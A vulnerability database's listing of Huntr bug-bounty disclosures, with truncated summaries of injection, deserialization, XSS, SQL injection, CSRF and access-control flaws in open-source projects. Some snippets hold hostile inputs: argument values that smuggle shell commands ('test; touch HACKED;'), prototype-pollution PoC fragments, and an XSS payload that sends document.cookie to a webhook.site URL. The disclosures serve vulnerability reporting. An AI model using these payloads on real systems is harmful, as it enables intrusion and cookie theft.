Lucene search
K
HuntrMost viewed

4072 matches found

Huntr
Huntr
added 2021/03/17 8:20 p.m.16 views

Command Injection in yibn2008/find-process

✍️ Description find-process is vulnerable to Command Injection through the find function. This function is capable to get information about running processes by PID number, port number or a string value. 🕵️‍♂️ Proof of Concept // PoC.js const find = require'find-process'; const command = "$touch...

2.6AI score
Exploits0References1
Huntr
Huntr
added 2021/03/10 4:44 p.m.16 views

Code Injection in prayag2/konsave

✍️ Description konsave is a CLI program that will let you save and apply your KDE Plasma customizations with just one command , which is vulnerable to YAML deserialization attack caused by unsafe loading leads to Arbitary Code Execution. 🕵️‍♂️ Proof of Concept Installation bash pip install konsave...

2.3AI score
Exploits0References2
Huntr
Huntr
added 2021/02/18 12:0 a.m.16 views

Code Injection in ngockhanh5110/nlp-vietnamese-text-summarization

Description nlp-vietnamese-text-summarization package is vulnerable to Arbitary Code Execution due to insecure yaml desearilization. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept steps to reproduce: python import os...

2.7AI score
Exploits0
Huntr
Huntr
added 2021/02/18 12:0 a.m.16 views

Code Injection in xdf8/deepfriedbot

Description DeepFriedBot is a telegram bot that sends random deep fried memes, package is vulnerable to Arbitary Code Execution. Vulnerability Vulnerable to YAML deserialization attack caused by unsafe loading. Proof of Concept python import os os.system'https://github.com/xdf8/DeepFriedBot'...

2.6AI score
Exploits0
Huntr
Huntr
added 2021/02/14 12:0 a.m.16 views

Cross-site Scripting (XSS) - Generic in ciur/papermerge-js

Description Papermerge is an open source document management system DMS primarily designed for archiving and retrieving your digital documents. Instead of having piles of paper documents all over your desk, office or drawers - you can quickly scan them and configure your scanner to directly uploa...

6.2AI score
Exploits0
Huntr
Huntr
added 2021/01/30 12:0 a.m.16 views

Code Injection in nosarthur/gita

✍️ Description gita helps to Manage multiple git repos with sanity. Vulnerability description Vulnerable to YAML deserialization attack caused by unsafe loading. 🕵️‍♂️ Proof of Concept vulnerable part of code yaml.load in getcmdsfromfiles...

0.9AI score
Exploits0
Huntr
Huntr
added 2021/01/10 12:0 a.m.16 views

Prototype Pollution in allgay/jsonuri

Description jsonuri is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js const set = require'jsonuri' var obj = console.log"Before : " + .polluted; set, 'proto/polluted', 'Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the following...

1.8AI score
Exploits0
Huntr
Huntr
added 2021/01/07 12:0 a.m.16 views

Code Injection in baidu/cup

Description CUP, common useful python-lib. Currently, Most popular python lib in baidu Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution. Proof of Concept Run exploit.py import os import pickle os.system'pip3 install cup' from...

1.2AI score
Exploits0References1
Huntr
Huntr
added 2020/11/18 12:0 a.m.16 views

Prototype Pollution in maikelvl/dot-json

Description dot-json is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...

1.8AI score
Exploits0
Huntr
Huntr
added 2020/09/14 12:0 a.m.16 views

Prototype Pollution in pierreinglebert/json-merge-patch

Description json-merge-patch is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following Po...

1.7AI score
Exploits0
Huntr
Huntr
added 2020/08/17 12:0 a.m.16 views

Insecure Storage of Sensitive Information in smirzaei/rails-session-decoder

Overview rails-session-decoder is a simple utility for decoding Rails 4.x sessions in Node.js, this package are vulnerable to Information Exposure. Missing verification of the Message Authentication Code appended to the cookies may lead to decryption of cipher text, exposing encrypted information...

2.3AI score
Exploits0References1
Huntr
Huntr
added 2020/07/28 12:0 a.m.16 views

Code Injection in mahdaen/node-import

Overview node-import is a package that imports dependencies and run it directly or concatenate them and exports to file. This package is vulnerable to Arbitrary Code Execution. The params argument of the module function can be controlled by users without any sanitization. This is then provided to...

4.2AI score
Exploits0References1
Huntr
Huntr
added 2020/06/16 12:0 a.m.16 views

Code Injection in strider-cd/strider-git

Overview strider-git allows strider to use any git repository for a project. he issue occurs because a user input is formatted inside a command that will be executed without any check...

4.9AI score
Exploits0References1
Huntr
Huntr
added 2020/05/02 12:0 a.m.16 views

Code Injection in courajs/node-svn

Description The svn module is vulnerable against RCE since a command is crafted using user inputs not validated and then executedading to arbitrary command injection POC 1. Create the following PoC file: js // poc.js var SVN = require'svn'; var svn = new SVN'./workingcopy'; svn.info"test; touch...

2.3AI score
Exploits0
Huntr
Huntr
added 2020/04/03 12:0 a.m.16 views

Cross-Site Request Forgery (CSRF) in tuhinshubhra/extanalysis

Overview The ExtAnalysis project is vulnerable against various CSRFs, that could lead to loss of functionalities and placement of malicious files in arbitrary directories without knowledge of the victim. Proof of Concept Credit: Mik317 1. Download the git project and run the server through the...

0.7AI score
Exploits0
Huntr
Huntr
added 2020/04/03 12:0 a.m.16 views

Command Injection in ionicabizau/node-gry

Overview The issue occurs because a user input is formatted inside a command that will be executed without any check. Proof of Concept Credit: Mik317 1. Create the following PoC file: js // poc.js const Repo = require"gry"; var myRepo = new Repo"."; myRepo.pull"test; touch HACKED; ", function...

1.3AI score
Exploits0
Huntr
Huntr
added 2019/08/18 12:0 a.m.16 views

Cross-site Scripting (XSS) - Generic in boxbilling/boxbilling

Overview Boxbilling is a free billing & client management software Affected versions of this software are vulnerable to Cross-site Scripting XSS. It is possible to inject JavaScript with object decoding such as alert1 resulting in XSS. Technical Description if we look in...

1.9AI score
Exploits0References2
Huntr
Huntr
added 2026/02/25 11:32 a.m.15 views

Incomplete Fix for CVE-2026-1669: HDF5 External Storage File Disclosure in Legacy H5 Loading

Description Keras 3 patched CVE-2026-1669 HDF5 External Storage File Disclosure in the new .keras and .weights.h5 loading paths by adding verifydataset to check for dataset.external in H5IOStore. However, the legacy .h5 loading path keras/src/legacy/saving/legacyh5format.py was not patched. This...

7.5CVSS5.9AI score0.00298EPSS
Exploits0
Huntr
Huntr
added 2023/09/28 5:29 p.m.15 views

CSRF Delete Navigation Menu Items

Description CSRF Delete Navigation Menu Items Proof of Concept 1 .Attack sends fake requests to users history.pushState'', '', '/'; document.forms0.submit; 2 .User click, deletes unwanted Navigation Menu Items Payload Poc...

7.1AI score0.0024EPSS
Exploits1
Huntr
Huntr
added 2023/09/13 8:25 a.m.15 views

Store XSS in Widgets and pages in instantsoft/icms2

Description I noticed that you filtered the filter very carefully. But there are still some parts you missed Proof of Concept 1 . Login with admin 2 . Go to "http://localhost/o2/admin/menu/itemedit/18" 3 . Insert payload in CSS class 4 . Click save , and go to home page, and Detect store xss in...

6.8AI score
Exploits0
Huntr
Huntr
added 2023/09/03 2:5 p.m.15 views

Stored XSS in module named "New Submissions"

Description I tested the demo site you provided. I see that there is an Stored XSS vulnerability. I hope you can check and provide a fix as soon as possible. Proof of Concept Link video Poc https://drive.google.com/file/d/1BaAnaZQyfbUTu54rzwRtTevr-wx100/view?usp=sharing Steps 1 .Login as account...

6AI score0.00411EPSS
Exploits1
Huntr
Huntr
added 2023/09/01 10:54 a.m.15 views

Stored XSS in module named "Create Issues"

Description I tested the demo site you provided. I see that there is an XSS vulnerability. I hope you can check and provide a fix as soon as possible. Proof of Concept link video Poc https://drive.google.com/file/d/1CEEFO0ukhjug6dNRfb-vdQNuBUyezoJp/view?usp=sharing Steps 1 .Login as account demo ...

6.2AI score0.00401EPSS
Exploits1
Huntr
Huntr
added 2023/08/20 3:58 p.m.15 views

DOM XSS in https://demo.modoboa.org/user/#profile/

Description I noticed, your website is very secure. But you overlooked a flaw DOM XSS. Detail: 1 .Login with demo account. 2 .Go to the link: https://demo.modoboa.org/user/profile/ and click Update 3 .Use burp to block proxy and inject payload in &language: Proof of Concept Video Poc...

4.9CVSS6.7AI score0.00565EPSS
Exploits1
Huntr
Huntr
added 2023/08/17 12:8 p.m.15 views

Improver Validation of File Name Causes RCE

Description Due to insufficient sanitization of the music file name, it is possible to execute arbitrary commands on the victims computer, through a specially crafted file name. Note that this bug was only found exploitable only on the MacOS version of this application. Although still applicable ...

7.7AI score
Exploits0
Huntr
Huntr
added 2023/08/01 4:23 p.m.15 views

Blind SSRF When Uploading Presentation (mitigation bypass)

Description This is actually a bypass of CVE-2023-33176 when i able to perform SSRF to internal network. Proof of Concept As we already know, we can upload files via api /bigbluebutton/api/insertDocument using a remote url. PresentationUrlDownloadServicesavePresentation is the method to handle th...

7.2AI score0.00471EPSS
Exploits0References1
Huntr
Huntr
added 2023/07/21 3:37 a.m.15 views

Insufficient Session Expiration because of lacking of cache check

Description The web application's session management system suffers from an "Insufficient Session Expiration" vulnerability due to the lack of proper cache check. This vulnerability allows a user's session to remain valid even after the user has logged out, potentially granting unauthorized acces...

6.4CVSS6.7AI score0.00507EPSS
Exploits1
Huntr
Huntr
added 2023/07/18 2:27 a.m.15 views

Vim's embedded terminal allows injection via DECRQSS response

Description DECRQSS is a terminal response that replies with certain information about the terminal. Various terminals have bugs where a piece of data from the request i.e. data that the terminal receives is echoed back in the reply. In some cases this is enough to make it so if untrusted data...

7.1AI score
Exploits0References2
Huntr
Huntr
added 2023/06/29 8:45 a.m.15 views

SQL injection in searchArticles function

Description The searchArticles function in the KB module makes a call to the getSimpleResultSet function, with the perpage parameter taken from the user without sanitizing before entering the query, leading to the attacker being able to manipulate the query. Proof of Concept GET...

7.5CVSS6.8AI score0.00922EPSS
Exploits1
Huntr
Huntr
added 2023/06/28 3:50 a.m.15 views

Stored XSS in Title

Description Spina's admin screen has an embedded XSS in the title of the page. By embedding arbitrary JavaScript code in the function of Paguri, arbitrary scripts can be executed on the browser when the administrator user who accessed the page deletes the page. Proof of Concept Step 1. Access the...

4.3CVSS6.4AI score0.00565EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/12 5:46 p.m.15 views

XSS Filter Bypass in Folder Name leading to Information Disclosure

Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

4.9CVSS6.6AI score0.00541EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/09 7:51 a.m.15 views

Stored XSS in Survey Groups Function

Description By Injecting the payloads to the fields Title, Description, users who visited "Survey list" screen maybe compromises Proof of Concept Step 1: Login as Administrator, go to the "Survey list" screen function, click "create survey group" button. Step 2: Inject the payload to the fields...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/05 8:52 a.m.15 views

IDOR can make attackers add or close others' unavaiable

both user1 and user2 are Providers 1 user1 login and add unavaiable 2 request can be like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...

4CVSS7AI score0.00374EPSS
Exploits1
Huntr
Huntr
added 2023/05/30 9:10 a.m.15 views

missing permission check for API /setting/workspace/member/update

Proof of Concept 1 user1 是workspace1的空间管理员 2 user2 是workspace1的成员 3 user1 更新user2的信息,比如将其更新为空间管理员 4 使用burpsuite拦截请求 POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...

6.5CVSS7AI score0.00711EPSS
Exploits1
Huntr
Huntr
added 2023/05/28 11:48 a.m.15 views

Improper Authorization in "Customer automation rules" function

Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...

6.4CVSS6.7AI score0.00444EPSS
Exploits1
Huntr
Huntr
added 2023/04/27 7:6 p.m.15 views

SQL Injection in expenses/ajax.php & loan-management/ajax.php

Description An administrator user can use different operations and parameters to execute SQL queries. -employeeId on operation addMonthlySalary in expenses/ajax.php. -returnAdvancePaymentEmployee on operation returnAdvancePaymentSubmit, in expenses/ajax.php. -id on operation editLoan in...

8.2AI score
Exploits0
Huntr
Huntr
added 2023/04/19 1:30 a.m.15 views

Improper Authorization lead a user can accept his answer as the best answer

Description Login as user A and make a question https://meta.answer.dev/questions/D1C7/how-to-set-my-laptop-auto-start-at-particular-time Login as User B and answer this As normal, User A can vote the answer of User B is best answer But with this vuln, User B can call the api POST...

3.5CVSS6.9AI score0.00462EPSS
Exploits1
Huntr
Huntr
added 2023/04/15 5:57 a.m.15 views

Account Owner Email Adrress Leakage Lead To Improper Access Control

Description hi team, when i try to create users for on https://public.tenant.kiwitcms.org/admin/auth/user//change/ i see that the users are not properly authenticated. i can create users with the same firstname,lastname, and email. normally, when we create the same users it should error with the...

6.8AI score
Exploits0
Huntr
Huntr
added 2023/04/12 8:29 a.m.15 views

Insufficient Filtering Leads to Stored Cross Site Scripting at FAQ

Description Cross-Site Scripting XSS attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a differen...

4.9CVSS5.8AI score0.00552EPSS
Exploits0References1
Huntr
Huntr
added 2023/04/12 7:23 a.m.15 views

Able to change admin email and password without current password validation.

Description Able to change admin email and password without current password validation. Change the User%5Buid%5D for the User UID of the current admin user. for the example: uid of the current admin is 1. Then change the other info like User%5Bemail%5D,User%5Bpassword%5D and passwordrepeat for...

7AI score
Exploits0
Huntr
Huntr
added 2023/04/09 9:9 p.m.15 views

SQL injection in SegmentAssignmentController.php

Description An administrator user can use the inheritableSegments feature to execute his own blind SQL queries. Proof of Concept The vulnerable php code is in src/Controller/Admin/SegmentAssignmentController.php, on method inheritableSegments: The parameter type is not escaped and is added on the...

5.8CVSS7.9AI score0.00935EPSS
Exploits1
Huntr
Huntr
added 2023/04/04 2:50 p.m.15 views

Broken Access Control in Vote/Friend Function

Description Unauthorized conduct by modifying, closing/re open a poll created by someone else. Delete friend of other account via id Proof of Concept Step 1: Use account 1 to create a poll\ \ account 2 not have perrmison edit/close/open on poll \ Step 2: Intercept request when account 1 edit,...

6.7AI score
Exploits0References1
Huntr
Huntr
added 2023/04/02 7:0 a.m.15 views

IDOR make one user can stop, start , delete, edit others' source

Proof of Concept 1 user1 create a source with id =1 2 user2 create a source with id =2 3 user1 delete the source with post DELETE /inlong/manager/api/source/delete/1?sourceType= HTTP/1.1 4 user1 repalce the 1 as 2, and find that he can sucess delete user2' source...

6.4CVSS6.9AI score0.01355EPSS
Exploits0
Huntr
Huntr
added 2023/03/29 8:32 a.m.15 views

Improper Restriction of Rendered UI Layers or Frames

Description The osTicket uses an incorrect method to validate the src attribute of the iframe tag. Although it appears that osTicket restricts domains through a whitelist, attackers can easily bypass this restriction. Proof of Concept This iframe is going to render www.youtube.com.attacker's serv...

6.9AI score
Exploits0References1
Huntr
Huntr
added 2023/03/29 8:24 a.m.15 views

XML External Entity (XXE) injection in sympy

Description Sympy is an open source platform that a computer algebra system written in pure Python . Sympy is vulnerable to an XML External Entity XXE injection in the applyxsl functionality of Sympy due to the usage of etree.XML. Proof of Concept // PoC.py from sympy.utilities.mathml import...

7.2AI score
Exploits0
Huntr
Huntr
added 2023/03/21 4:27 p.m.15 views

Stored XSS via name parameter of "Predefined Properties"

Description It's observed that the name parameter of the "Predefined Properties" functionality is vulnerable to stored XSS. Proof of Concept 1.Login to https://demo.pimcore.fun/admin/. 2.Now go to Settings - Predefined Properties - Add and Enter the payload: " inside the name input field. 3.Then...

4.9CVSS6.2AI score0.00497EPSS
Exploits1References1
Huntr
Huntr
added 2023/03/13 3:58 p.m.15 views

Autenticated Stored Cross-Site Scripting (XSS)

Description Login to the admin account. Use the following URL http://192.168.0.211/admin.php?action=files or navigate to pages - manage files. Upload the XSS payload with “.html” extension. Intercept the request with Burp Suite. Modify the Content-Type to application/x-php and forward the request...

6.1AI score
Exploits0
Huntr
Huntr
added 2023/03/08 10:34 a.m.15 views

Multiple XSS @ answer/question/tag

Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept Posting the Question: func req QuestionAdd Check errFields validator.FormErrorField, err error...

4.9CVSS5.5AI score0.00536EPSS
Exploits1References1
Huntr
Huntr
added 2023/02/28 10:45 a.m.15 views

Stored XSS in Notification and Data Management

Description Please enter a description of the vulnerability. Proof of Concept 1. Go to a survey and to Settings = Notifications and data. 2. Turn off Inherit option for Send basic notification email to: or Send basic notification email to: 3. Enter the following payload: " and Save...

6.7AI score
Exploits0References1
Huntr
Huntr
added 2023/02/21 7:28 a.m.15 views

Rxss in msg parameter

Affected url Affected parameter : msg It appear that html tags are rendered in the page via msg parameter. So I tried tag and it work, so i tried adding event handlers in this case onpageshow=alertdocument.domainand it trigred xss. POC :...

1.6AI score
Exploits0
Huntr
Huntr
added 2023/02/20 8:21 a.m.15 views

Race Condition Vulnerability can Leads to Up Vote Stealing

Description I tested in the live production site https://meta.answer.dev/. There are up vote / down vote functions in answerdev. An attacker can increase or decrease votes by using race condition vulnerability. Proof of Concept 1. Go to an question and press up vote or down vote. 2. PoC will show...

2.6CVSS6.8AI score0.00405EPSS
Exploits1References1
Total number of security vulnerabilities4072